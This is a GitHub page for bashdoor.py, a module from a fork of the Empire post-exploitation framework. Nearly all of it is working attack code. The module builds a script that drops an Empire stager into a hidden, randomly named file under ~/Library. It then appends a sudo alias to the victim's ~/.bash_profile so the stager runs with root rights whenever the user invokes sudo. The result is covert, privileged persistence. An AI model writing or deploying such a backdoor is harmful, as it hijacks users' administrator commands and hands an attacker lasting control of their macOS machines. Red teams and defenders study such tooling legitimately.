forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 584
/
Copy pathbashdoor.py
47 lines (44 loc) · 1.36 KB
/
bashdoor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
class Module:
@staticmethod
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# extract all of our options
listenerName = params["Listener"]
userAgent = params["UserAgent"]
safeChecks = params["SafeChecks"]
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(
listenerName,
language="python",
encode=True,
userAgent=userAgent,
safeChecks=safeChecks,
)
launcher = launcher.replace('"', '\\"')
script = """
import os
from random import choice
from string import ascii_uppercase
home = os.getenv("HOME")
randomStr = ''.join(choice(ascii_uppercase) for i in range(12))
bashlocation = home + "/Library/." + randomStr + ".sh"
with open(home + "/.bash_profile", "a") as profile:
profile.write("alias sudo='sudo sh -c '\\\\''" + bashlocation + " & exec \\"$@\\"'\\\\'' sh'")
launcher = "%s"
stager = "#!/bin/bash\\n"
stager += launcher
with open(bashlocation, 'w') as f:
f.write(stager)
f.close()
os.chmod(bashlocation, 0755)
""" % (
launcher
)
return script